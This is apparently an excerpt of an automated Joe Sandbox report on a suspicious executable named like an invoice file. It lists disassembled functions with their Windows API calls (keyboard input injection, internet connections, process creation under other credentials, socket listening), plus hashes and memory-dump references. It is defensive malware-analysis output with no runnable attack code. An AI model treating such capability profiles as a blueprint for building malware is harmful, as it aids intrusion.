Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: f991335ec82ac4f7344ddb80653b33860cf10617ac06ea61650b0b0e144684d5
Instruction ID: edb1abf933d43b70852e7cbb60cdbbb9da8761721e02f444c37565d5024fb856
Opcode Fuzzy Hash: f991335ec82ac4f7344ddb80653b33860cf10617ac06ea61650b0b0e144684d5
Instruction Fuzzy Hash: E241AC70E0021CEFCB11EF59D884BAA7BF6BB45391F1881AAE6258B250C734E849DB54

Function 004D3A61 Relevance: 6.1, APIs: 4, Instructions: 104keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,75A4C0D0,?,00008000), ref: 004D3AB8
SetKeyboardState.USER32(00000080,?,00008000), ref: 004D3AD4
PostMessageW.USER32(00000000,00000101,00000000,?), ref: 004D3B34
SendInput.USER32(00000001,?,0000001C,75A4C0D0,?,00008000), ref: 004D3B92

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: cdcb85f51876893fa94c0a9e6293418d618490f34021d7283693bd0e80180083
Instruction ID: 7ff67f4c987832915adcbdb0f240cad3b5f367a6cbf7eb2705f0149dadcb9968
Opcode Fuzzy Hash: cdcb85f51876893fa94c0a9e6293418d618490f34021d7283693bd0e80180083
Instruction Fuzzy Hash: D531F630A00658AEEF208F6588397FE7BB69B55316F04015BE481933D2C77CAA45D76A

Function 004C4004 Relevance: 6.1, APIs: 4, Instructions: 96COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004C4038
__isleadbyte_l.LIBCMT ref: 004C4066
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 004C4094
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 004C40CA

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 42a87d76c98dfa73335a9ef45d72c4de22db3953c4633f34765bcbf35b05ce30
Instruction ID: c3465f5a83690b8e46799ed2e77c628ac67722cb93c3e9752e263bb36c9370f1
Opcode Fuzzy Hash: 42a87d76c98dfa73335a9ef45d72c4de22db3953c4633f34765bcbf35b05ce30
Instruction Fuzzy Hash: 3B312434640206AFDB219F36C954FBB3BB5BF80310F15402EE65087290D739D890D794

Function 004E431C Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 004E4358

Part of subcall function 004E43E2: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 004E4401
Part of subcall function 004E43E2: InternetCloseHandle.WININET(00000000), ref: 004E449E

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: Internet$CloseConnectHandleOpen
String ID:
API String ID: 1463438336-0
Opcode ID: eaec0d1c8de87e2a01910e500849bc6c1def029c05ab244eb19f2043d3c660c2
Instruction ID: 52ba1b604f8cf0bc82e2b0b43f6d72ea752963fa63ff8d7cba52f5d9b19f24b0
Opcode Fuzzy Hash: eaec0d1c8de87e2a01910e500849bc6c1def029c05ab244eb19f2043d3c660c2
Instruction Fuzzy Hash: 3721D131300641BBEB219F629C00FBBB7A9FF94716F10401FBA1596690DB799825A7A8

Function 004CAF64 Relevance: 6.1, APIs: 4, Instructions: 73processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 004CAFAE
OpenProcessToken.ADVAPI32(00000000), ref: 004CAFB5
CloseHandle.KERNEL32(00000004), ref: 004CAFCF
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 004CAFFE

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: Process$CloseCreateCurrentHandleLogonOpenTokenWith
String ID:
API String ID: 2621361867-0
Opcode ID: f9d708bf2c20936370cb09d930093002230fe680ead85206de1ca2c02da91620
Instruction ID: 8ebae11e5fa58137be61bd67a51fcd6bcd54db5035c3397c63cd5626a95141f1
Opcode Fuzzy Hash: f9d708bf2c20936370cb09d930093002230fe680ead85206de1ca2c02da91620
Instruction Fuzzy Hash: FF214F7610020DABDF428FA4DD09FEE7BB9EB44308F04801AF901A2161D3799D25EB65

Function 004E8A7F Relevance: 6.1, APIs: 4, Instructions: 69networkCOMMON

Download Yara Rule

APIs

select.WS2_32(00000000,00000001,00000000,00000000,?), ref: 004E8AE0
__WSAFDIsSet.WS2_32(00000000,00000001), ref: 004E8AF2
accept.WS2_32(00000000,00000000,00000000), ref: 004E8AFF
WSAGetLastError.WS2_32(00000000), ref: 004E8B16

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: ErrorLastacceptselect
String ID:
API String ID: 385091864-0
Opcode ID: a70b42e58fb488c247f8eb60b8a647fdceb66a44a6389c01a5e6cbf06b2f92e3
Instruction ID: 055957ad2267959f5c65f8801f87ae69e48ba715c61a3dd9e0e3dacf9b08e431
Opcode Fuzzy Hash: a70b42e58fb488c247f8eb60b8a647fdceb66a44a6389c01a5e6cbf06b2f92e3
Instruction Fuzzy Hash: CD21C672A001249FCB119F69C884ADEBBFCEF5A310F00816EF849D7290DB7899458FA4

Function 004F8A37 Relevance: 6.1, APIs: 4, Instructions: 69COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 004F8AA6
SetWindowLongW.USER32(?,000000EC,00000000), ref: 004F8AC0
SetWindowLongW.USER32(?,000000EC,00000000), ref: 004F8ACE
SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 004F8ADC

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: b78c7b5d6fba9cbea102230bbc6a4c44b220c1c56308a8e16f2de6518cb4715e
Instruction ID: c753bf035b6c16857428ddaa0d775512d96a816b4609b40ea66572892b0a2046
Opcode Fuzzy Hash: b78c7b5d6fba9cbea102230bbc6a4c44b220c1c56308a8e16f2de6518cb4715e
Instruction Fuzzy Hash: A1119331705115AFDB04AB19CC05FBA77A9EF96324F14816FF916CB2E1CBB8AC018798

Function 004D0AA6 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004D1E68: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,004D0ABB,?,?,?,004D187A,00000000,000000EF,00000119,?,?), ref: 004D1E77
Part of subcall function 004D1E68: lstrcpyW.KERNEL32(00000000,?,?,004D0ABB,?,?,?,004D187A,00000000,000000EF,00000119,?,?,00000000), ref: 004D1E9D
Part of subcall function 004D1E68: lstrcmpiW.KERNEL32(00000000,?,004D0ABB,?,?,?,004D187A,00000000,000000EF,00000119,?,?), ref: 004D1ECE

lstrlenW.KERNEL32(?,00000002,?,?,?,?,004D187A,00000000,000000EF,00000119,?,?,00000000), ref: 004D0AD4
lstrcpyW.KERNEL32(00000000,?,?,004D187A,00000000,000000EF,00000119,?,?,00000000), ref: 004D0AFA
lstrcmpiW.KERNEL32(00000002,cdecl,?,004D187A,00000000,000000EF,00000119,?,?,00000000), ref: 004D0B2E

Strings

cdecl, xrefs: 004D0B25

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: 6cdcfa955c2a122233ea05ba5e0b8fda4c00aec85da234dffedd079c9a20b1ad
Instruction ID: db05c46f0d6bf17b8b6ed73084658d6f9b0abb44cd04f0b3b0e363e78fb409d9
Opcode Fuzzy Hash: 6cdcfa955c2a122233ea05ba5e0b8fda4c00aec85da234dffedd079c9a20b1ad
Instruction Fuzzy Hash: E411A236200305BFDB259F64D819E7A77B8FF55314F80402BE806CB350EB75A840D7A5

Function 004C2F96 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 004C2FB5

Part of subcall function 004B395C: __FF_MSGBANNER.LIBCMT ref: 004B3973
Part of subcall function 004B395C: __NMSG_WRITE.LIBCMT ref: 004B397A
Part of subcall function 004B395C: RtlAllocateHeap.NTDLL(01300000,00000000,00000001), ref: 004B399F

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: df9bb6a856efbdf4e476f720487bfa2f852e866686617f39b1a995ca2bb49528
Instruction ID: 5c99d36ba81868788efe3ae9cad9fe98d817277d358cd6c96f68894cabc5aa93
Opcode Fuzzy Hash: df9bb6a856efbdf4e476f720487bfa2f852e866686617f39b1a995ca2bb49528
Instruction Fuzzy Hash: 3011EE365042159FDB713F71AC04B9A3FB4AF50365F10842FF80596155DB7CC940A6A9

Function 004D058F Relevance: 6.1, APIs: 4, Instructions: 64registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 004D05AC
LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 004D05C7
RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 004D05DD
FreeLibrary.KERNEL32(?), ref: 004D0632

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: Type$FileFreeLibraryLoadModuleNameRegister
String ID:
API String ID: 3137044355-0
Opcode ID: 08b1c7cf9f6d830e8c975dac06bbbc5691e1a9d015f2b0f0bcf769c63293bfcb
Instruction ID: 3b97e7342560f7150824bea69064ababdc16e5616025e76b964056a4b169bd19
Opcode Fuzzy Hash: 08b1c7cf9f6d830e8c975dac06bbbc5691e1a9d015f2b0f0bcf769c63293bfcb
Instruction Fuzzy Hash: F2219071900208EBDB20CF91DCA8BDABBB8EF40704F00846BE91697210D778EA55DF65

Function 004D6713 Relevance: 6.1, APIs: 4, Instructions: 64fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 004D6733
_memset.LIBCMT ref: 004D6754
DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 004D67A6
CloseHandle.KERNEL32(00000000), ref: 004D67AF

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle_memset
String ID:
API String ID: 1157408455-0
Opcode ID: a115dcbed2738670232f18b84d89a1718bb6307757f2764ff0e345c1b2b5036d
Instruction ID: 4f8fd5fe879ddfe4baa6733e9ed004c1e3a961b400365a89f1e0b266879f22b4
Opcode Fuzzy Hash: a115dcbed2738670232f18b84d89a1718bb6307757f2764ff0e345c1b2b5036d
Instruction Fuzzy Hash: C311E7759012287AE72057A5AC4DFEBBABCEF44724F11459BF904E72C0D2745E848B78

Function 004CB1CC Relevance: 6.1, APIs: 4, Instructions: 63memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 004CAA62: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 004CAA79
Part of subcall function 004CAA62: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 004CAA83
Part of subcall function 004CAA62: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 004CAA92
Part of subcall function 004CAA62: RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 004CAA99
Part of subcall function 004CAA62: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 004CAAAF

GetLengthSid.ADVAPI32(?,00000000,004CADE4,?,?), ref: 004CB21B
GetProcessHeap.KERNEL32(00000008,00000000), ref: 004CB227
RtlAllocateHeap.NTDLL(00000000), ref: 004CB22E
CopySid.ADVAPI32(?,00000000,?), ref: 004CB247

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: Heap$AllocateInformationProcessToken$CopyErrorLastLength
String ID:
API String ID: 259861997-0
Opcode ID: 742d56341a3c386f90c7465e84588ce21f683c579c4fcfe23139165c9aaed82d
Instruction ID: 033d7cc9d0052332f081930f0636649c24b71ca6270c2bfbd14c6de076ed44df
Opcode Fuzzy Hash: 742d56341a3c386f90c7465e84588ce21f683c579c4fcfe23139165c9aaed82d
Instruction Fuzzy Hash: 8E119375600209EFCB449F54DC49FAFB7B9EF95308F14805EE54297210D7399E48DB64

Function 004CB478 Relevance: 6.1, APIs: 4, Instructions: 58windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 004CB498
SendMessageW.USER32(?,000000C9,?,00000000), ref: 004CB4AA
SendMessageW.USER32(?,000000C9,?,00000000), ref: 004CB4C0
SendMessageW.USER32(?,000000C9,?,00000000), ref: 004CB4DB

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 0f6c5d1b48bac53ef36a7e2e6a4eccc6fc29b38d795084d881be72d038694f24
Instruction ID: c8d7fecd074463d4e96dca28a6fd6677d56a26de2be2f7d44577fb768ffe04a8
Opcode Fuzzy Hash: 0f6c5d1b48bac53ef36a7e2e6a4eccc6fc29b38d795084d881be72d038694f24
Instruction Fuzzy Hash: ED11367A900218BFDB11DBA9C981F9DBBB4FB08700F204096E604A7290D771AE11DB98

Function 004D732B Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 004D7352
MessageBoxW.USER32(?,?,?,?), ref: 004D7385
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 004D739B
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004D73A2

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait
String ID:
API String ID: 2880819207-0
Opcode ID: 385e3f22245aa1f12c6c901b188551d10dfc7b2b6bac6b1399c48e216ff63963
Instruction ID: 8b7cdee4b6e48e88d88de3563d4d9b4eeb0f3bc55dfe03115e6ae870c8c431f1
Opcode Fuzzy Hash: 385e3f22245aa1f12c6c901b188551d10dfc7b2b6bac6b1399c48e216ff63963
Instruction Fuzzy Hash: 0E11E176A04214ABC7019BA8DC06ADE7BA99B54351F144217FC25D33A1E6748D08A7B5

Function 004AD17C Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 004AD1BA
GetStockObject.GDI32(00000011), ref: 004AD1CE
SendMessageW.USER32(00000000,00000030,00000000), ref: 004AD1D8

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: a51d28b524084054bec6bdf4b4f440f1d7b8dd006c4ab6c3e73c913026123e05
Instruction ID: 1e8a56c3991bcf985e2d2dbd511060dba01aa680ca23d01f837aee57c0f55d70
Opcode Fuzzy Hash: a51d28b524084054bec6bdf4b4f440f1d7b8dd006c4ab6c3e73c913026123e05
Instruction Fuzzy Hash: 9E11C072901609BFEF024FA0DC55EEBBB69FF2A364F044102FA0652150CB35DD60EBA0

Function 004C4DF2 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 004C4E16

Part of subcall function 004C54F5: __fltout2.LIBCMT ref: 004C551E

__cftog_l.LIBCMT ref: 004C4E3C
__cftoe_l.LIBCMT ref: 004C4E6E

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
Instruction ID: 83401ae88c640ef617c140edb8bcb1994a0494af0309d0039679fea80c231c0e
